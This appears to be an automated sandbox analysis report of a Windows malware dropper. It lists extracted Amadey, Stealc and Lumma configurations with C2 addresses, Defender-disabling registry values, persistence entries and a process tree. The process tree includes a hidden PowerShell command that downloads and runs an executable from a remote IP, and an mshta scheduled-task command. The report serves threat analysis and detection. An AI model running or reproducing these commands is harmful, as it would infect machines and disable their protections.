Analysis
max time kernel: 150s
max time network: 150s
platform: windows7_x64
resource: win7-20240729-en
resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
submitted: 10/03/2025, 15:51
Static task: static1
Behavioral task: behavioral1
Sample: 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe
Resource: win7-20240729-en
Behavioral task: behavioral2
Sample: 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe
Resource: win10v2004-20250217-en
General
Target: 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe
Size: 938KB
MD5: afdfccd956ad7ac9e185bc503802ff22
SHA1: 9708fd1a5ee5b4728c67a6b2b5687e012dea98a3
SHA256: 57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700
SHA512: 1fe8a89524a2e35d2dd53550fcbccf24429a6c6e8be4d40e9e99daf735dafc505dbee08ae74d9cc2c58eef5517c7865428d955483904af7d37ed9ffd91666a70
SSDEEP: 24576:CqDEvCTbMWu7rQYlBQcBiT6rprG8a4gu:CTvC/MTQYxsWR7a4g
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
install_dir: bb556cff4a
install_file: rapes.exe
strings_key: a131b127e996a898cd19ffb2d92e481b
url_paths: /Ni9kiput/index.php
Extracted
lumma
Extracted
stealc
trump
http://45.93.20.28
url_path: /85a1cacf11314eb8.php
Signatures
-
Amadey family
-
DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, capable of loading additional plugins.
-
Dcrat family
-
Detects Healer, an antivirus disabler dropper 2 IoCs
resource | yara_rule
behavioral1/memory/3360-739-0x0000000000A60000-0x0000000000EB0000-memory.dmp | healer
behavioral1/memory/3360-740-0x0000000000A60000-0x0000000000EB0000-memory.dmp | healer
Healer family
-
Lumma family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\SSD.exe," | reg.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | 9b50395388.exe
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | 9b50395388.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | 9b50395388.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | 9b50395388.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | 9b50395388.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | 9b50395388.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | 9b50395388.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 9b50395388.exe
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | 9b50395388.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | 9b50395388.exe
Stealc family
-
DCRat payload 4 IoCs
resource | yara_rule
behavioral1/files/0x000400000001da69-1061.dat | family_dcrat_v2
behavioral1/memory/4976-1063-0x0000000000B30000-0x0000000000BBA000-memory.dmp | family_dcrat_v2
behavioral1/memory/4528-1141-0x0000000000D10000-0x0000000000D9A000-memory.dmp | family_dcrat_v2
behavioral1/memory/1608-1349-0x00000000003F0000-0x000000000047A000-memory.dmp | family_dcrat_v2
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 27264e0632.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 0dce80a750.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 2b06f6fb99.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | cuFIzyH.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 9b50395388.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ed16143bb3.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 5aba4d79e5.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ac4788203f.exe
Blocklisted process makes network request 5 IoCs
flow | pid | Process
4 | 2880 | powershell.exe
27 | 2948 | wscript.exe
29 | 1356 | powershell.exe
31 | 2072 | powershell.exe
188 | 3900 | wscript.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Runs PowerShell with its display window hidden.
pid | Process
1356 | powershell.exe
2072 | powershell.exe
2880 | powershell.exe
2732 | powershell.exe
2996 | powershell.exe
2824 | powershell.exe
1100 | powershell.exe
2960 | powershell.exe
Downloads MZ/PE file 25 IoCs
flow pid Process 131 1132 rapes.exe 131 1132 rapes.exe 131 1132 rapes.exe 131 1132 rapes.exe 150 4924 BitLockerToGo.exe 4 2880 powershell.exe 29 1356 powershell.exe 35 1132 rapes.exe 35 1132 rapes.exe 35 1132 rapes.exe 35 1132 rapes.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 129 3044 0dce80a750.exe 188 3900 wscript.exe 31 2072 powershell.exe 7 1132 rapes.exe 7 1132 rapes.exe 7 1132 rapes.exe 7 1132 rapes.exe 7 1132 rapes.exe 27 2948 wscript.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
pid | Process
972 | chrome.exe
2504 | chrome.exe
3536 | chrome.exe
3812 | chrome.exe
3924 | chrome.exe
3932 | chrome.exe
1956 | chrome.exe
2700 | chrome.exe
Checks BIOS information in registry 2 TTPs 24 IoCs
BIOS information is often read in order to detect sandboxing environments.
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe | cmd.exe
Executes dropped EXE 42 IoCs
pid Process 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 1132 rapes.exe 2480 cuFIzyH.exe 1812 iZ73hNr.exe 3004 iZ73hNr.exe 2264 P2SXMuh.exe 2616 P2SXMuh.exe 2992 0uzaP1a.exe 1092 Security Protection Windows.pif 2276 db7e2fd40a.exe 2292 OpenCL.pif 352 TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE 1120 OpenCL.pif 1960 483d2fa8a0d53818306efeb32d3.exe 1696 27264e0632.exe 3044 0dce80a750.exe 1588 d1deb9a751.exe 3360 9b50395388.exe 3328 6z1l5Yn.exe 4784 8p5Lrev.exe 4824 8p5Lrev.exe 4948 4p0OMTuhea.exe 4976 abaMpGYmAU.exe 4368 2b06f6fb99.exe 4528 firefox.exe 3792 ed16143bb3.exe 3828 5aba4d79e5.exe 3620 ac4788203f.exe 5068 4022269ebc.exe 5108 4022269ebc.exe 4284 8p5Lrev.exe 4324 8p5Lrev.exe 2784 8p5Lrev.exe 320 1j3kLiDowh.exe 1608 T9wBxU6hjy.exe 4100 6z1l5Yn.exe 4936 0uzaP1a.exe 3944 P2SXMuh.exe 3572 P2SXMuh.exe 1548 Security Protection Windows.pif 4044 iZ73hNr.exe 4944 iZ73hNr.exe -
Identifies Wine through registry keys 2 TTPs 12 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | cuFIzyH.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | 483d2fa8a0d53818306efeb32d3.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | ed16143bb3.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | 5aba4d79e5.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | ac4788203f.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | 27264e0632.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | 0dce80a750.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | 9b50395388.exe
Key opened | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine | 2b06f6fb99.exe
Loads dropped DLL 64 IoCs
pid Process 2880 powershell.exe 2880 powershell.exe 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1812 iZ73hNr.exe 2472 WerFault.exe 2472 WerFault.exe 2472 WerFault.exe 1416 WerFault.exe 1416 WerFault.exe 1416 WerFault.exe 1132 rapes.exe 1132 rapes.exe 2264 P2SXMuh.exe 1132 rapes.exe 1132 rapes.exe 2948 wscript.exe 2948 wscript.exe 1132 rapes.exe 2032 cmd.exe 1356 powershell.exe 1356 powershell.exe 584 cmd.exe 2072 powershell.exe 2072 powershell.exe 1132 rapes.exe 1132 rapes.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 4784 8p5Lrev.exe 4824 8p5Lrev.exe 4824 8p5Lrev.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 1132 rapes.exe 1132 rapes.exe 4692 WerFault.exe 4692 WerFault.exe 4692 WerFault.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 1132 rapes.exe 5068 4022269ebc.exe 1108 WerFault.exe 1108 WerFault.exe 1108 WerFault.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials, etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | 9b50395388.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | 9b50395388.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\d1deb9a751.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10168030101\\d1deb9a751.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\9b50395388.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10168040101\\9b50395388.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\db7e2fd40a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10167640101\\db7e2fd40a.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10167650121\\am_no.cmd" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\27264e0632.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10168010101\\27264e0632.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\0dce80a750.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10168020101\\0dce80a750.exe" | rapes.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/files/0x0005000000019cca-204.dat | autoit_exe
behavioral1/files/0x000400000001cc8a-576.dat | autoit_exe
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
pid | Process
2620 | TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE
1132 | rapes.exe
2480 | cuFIzyH.exe
352 | TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE
1960 | 483d2fa8a0d53818306efeb32d3.exe
1696 | 27264e0632.exe
3044 | 0dce80a750.exe
3360 | 9b50395388.exe
4368 | 2b06f6fb99.exe
3792 | ed16143bb3.exe
3828 | 5aba4d79e5.exe
3620 | ac4788203f.exe
Suspicious use of SetThreadContext 9 IoCs
description | pid | Process | procid_target
PID 1812 set thread context of 3004 | 1812 | iZ73hNr.exe | 42
PID 2264 set thread context of 2616 | 2264 | P2SXMuh.exe | 48
PID 4784 set thread context of 4824 | 4784 | 8p5Lrev.exe | 135
PID 3792 set thread context of 4924 | 3792 | ed16143bb3.exe | 147
PID 5068 set thread context of 5108 | 5068 | 4022269ebc.exe | 151
PID 4284 set thread context of 2784 | 4284 | 8p5Lrev.exe | 157
PID 3620 set thread context of 4392 | 3620 | ac4788203f.exe | 160
PID 3944 set thread context of 3572 | 3944 | P2SXMuh.exe | 178
PID 4044 set thread context of 4944 | 4044 | iZ73hNr.exe | 184
resource | yara_rule
behavioral1/files/0x0005000000019926-168.dat | upx
behavioral1/memory/2992-180-0x00000000001D0000-0x000000000046C000-memory.dmp | upx
behavioral1/memory/2992-182-0x00000000001D0000-0x000000000046C000-memory.dmp | upx
behavioral1/files/0x0005000000019f8a-190.dat | upx
behavioral1/memory/1092-198-0x0000000000800000-0x0000000000CA6000-memory.dmp | upx
behavioral1/memory/1092-286-0x0000000000800000-0x0000000000CA6000-memory.dmp | upx
behavioral1/memory/1092-300-0x0000000000800000-0x0000000000CA6000-memory.dmp | upx
behavioral1/memory/1092-754-0x0000000000800000-0x0000000000CA6000-memory.dmp | upx
Drops file in Program Files directory 2 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\Windows Mail\it-IT\lsm.exe | abaMpGYmAU.exe
File created | C:\Program Files (x86)\Windows Mail\it-IT\101b941d020240 | abaMpGYmAU.exe
Drops file in Windows directory 3 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\rapes.job | TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE
File created | C:\Windows\DigitalLocker\it-IT\firefox.exe | abaMpGYmAU.exe
File created | C:\Windows\DigitalLocker\it-IT\0fc223bdacedc3 | abaMpGYmAU.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid | pid_target | Process | procid_target
2472 | 3004 | WerFault.exe | 42
1416 | 2480 | WerFault.exe | 39
2172 | 1696 | WerFault.exe | 84
4692 | 4368 | WerFault.exe | 142
1108 | 5068 | WerFault.exe | 150
4220 | 5108 | WerFault.exe | 151
3700 | 4944 | WerFault.exe | 184
System Location Discovery: System Language Discovery 1 TTPs 63 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
3412 | PING.EXE
4128 | PING.EXE
3328 | cmd.exe
4876 | PING.EXE
4092 | cmd.exe
3560 | PING.EXE
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 0dce80a750.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 0dce80a750.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Delays execution with timeout.exe 1 IoCs
pid | Process
2748 | timeout.exe
Enumerates system info in registry 2 TTPs 6 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Kills process with taskkill 6 IoCs
pid | Process
4764 | taskkill.exe
764 | taskkill.exe
1936 | taskkill.exe
2172 | taskkill.exe
1224 | taskkill.exe
2692 | taskkill.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings | firefox.exe
Modifies system certificate store 2 TTPs 11 IoCs
Runs ping.exe 1 TTPs 4 IoCs
pid | Process
4128 | PING.EXE
4876 | PING.EXE
3560 | PING.EXE
3412 | PING.EXE
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2824 | schtasks.exe
2252 | schtasks.exe
1684 | schtasks.exe
2208 | schtasks.exe
4728 | schtasks.exe
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description | flow | ioc
HTTP User-Agent header | 27 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 188 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2880 powershell.exe 2880 powershell.exe 2880 powershell.exe 2620 TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE 1132 rapes.exe 2480 cuFIzyH.exe 1356 powershell.exe 2960 powershell.exe 1356 powershell.exe 1356 powershell.exe 352 TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE 2732 powershell.exe 2996 powershell.exe 2824 powershell.exe 2072 powershell.exe 1100 powershell.exe 2072 powershell.exe 2072 powershell.exe 1960 483d2fa8a0d53818306efeb32d3.exe 1696 27264e0632.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 1956 chrome.exe 1956 chrome.exe 1588 d1deb9a751.exe 3360 9b50395388.exe 3360 9b50395388.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 1588 d1deb9a751.exe 1588 d1deb9a751.exe 3536 chrome.exe 3536 chrome.exe 3360 9b50395388.exe 3360 9b50395388.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 3044 0dce80a750.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe 4976 abaMpGYmAU.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
(48 events, collapsed by token and pid in order of first occurrence)
Token                pid   Process                events
SeDebugPrivilege     2880  powershell.exe         1
SeDebugPrivilege     1356  powershell.exe         1
SeDebugPrivilege     2960  powershell.exe         1
SeDebugPrivilege     2732  powershell.exe         1
SeDebugPrivilege     2996  powershell.exe         1
SeDebugPrivilege     2824  powershell.exe         1
SeDebugPrivilege     2072  powershell.exe         1
SeDebugPrivilege     1100  powershell.exe         1
SeShutdownPrivilege  1956  chrome.exe             8
SeDebugPrivilege     764   taskkill.exe           1
SeDebugPrivilege     1936  taskkill.exe           1
SeDebugPrivilege     2172  taskkill.exe           1
SeDebugPrivilege     1224  taskkill.exe           1
SeDebugPrivilege     2692  taskkill.exe           1
SeDebugPrivilege     2612  firefox.exe            2
SeShutdownPrivilege  3536  chrome.exe             18
SeDebugPrivilege     3360  9b50395388.exe         1
SeDebugPrivilege     3328  6z1l5Yn.exe            1
SeDebugPrivilege     4976  abaMpGYmAU.exe         1
SeDebugPrivilege     4528  firefox.exe            1
SeDebugPrivilege     1608  T9wBxU6hjy.exe         1
SeDebugPrivilege     4100  6z1l5Yn.exe            1
SeDebugPrivilege     4764  taskkill.exe           1
Suspicious use of FindShellTrayWindow 24 IoCs
(24 events, collapsed by pid in order of first occurrence)
pid   Process                                                                 events
2508  57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe   3
2620  TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE                                1
2276  db7e2fd40a.exe                                                          3
1956  chrome.exe                                                              1
1588  d1deb9a751.exe                                                          11
2612  firefox.exe                                                             4
3536  chrome.exe                                                              1
Suspicious use of SendNotifyMessage 20 IoCs
(20 events, collapsed by pid in order of first occurrence)
pid   Process                                                                 events
2508  57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe   3
2276  db7e2fd40a.exe                                                          3
1588  d1deb9a751.exe                                                          11
2612  firefox.exe                                                             3
Suspicious use of WriteProcessMemory 64 IoCs
(64 events, collapsed by writer/target pair in order of first occurrence; procid_target is the report's internal process index, not a PID)
pid   Process                                                                 wrote to PID  procid_target  events
2508  57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe   468           30             4
2508  57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe   2264          31             4
468   cmd.exe                                                                 2824          33             4
2264  mshta.exe                                                               2880          34             4
2880  powershell.exe                                                          2620          36             4
2620  TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE                                1132          37             4
1132  rapes.exe                                                               2480          39             4
1132  rapes.exe                                                               1812          40             4
1812  iZ73hNr.exe                                                             3004          42             10
3004  iZ73hNr.exe                                                             2472          44             4
2480  cuFIzyH.exe                                                             1416          45             4
1132  rapes.exe                                                               2264          46             4
2264  P2SXMuh.exe                                                             2616          48             10
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API (ITaskService) can be used to register tasks that run at boot or at set times without spawning schtasks.exe, so process-creation telemetry alone will not show these registrations; the task XML under C:\Windows\System32\Tasks and Event ID 4698 (task created) will.
Processes
C:\Users\Admin\AppData\Local\Temp\57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe"C:\Users\Admin\AppData\Local\Temp\57fca31d95f19b9d69f805c5a930ff5eb42bcb07fcf466e5ab0ce89e689b4700.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YRotqmaC08o /tr "mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YRotqmaC08o /tr "mshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2824
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\tO5YXCR8k.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'POFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE"C:\Users\Admin\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
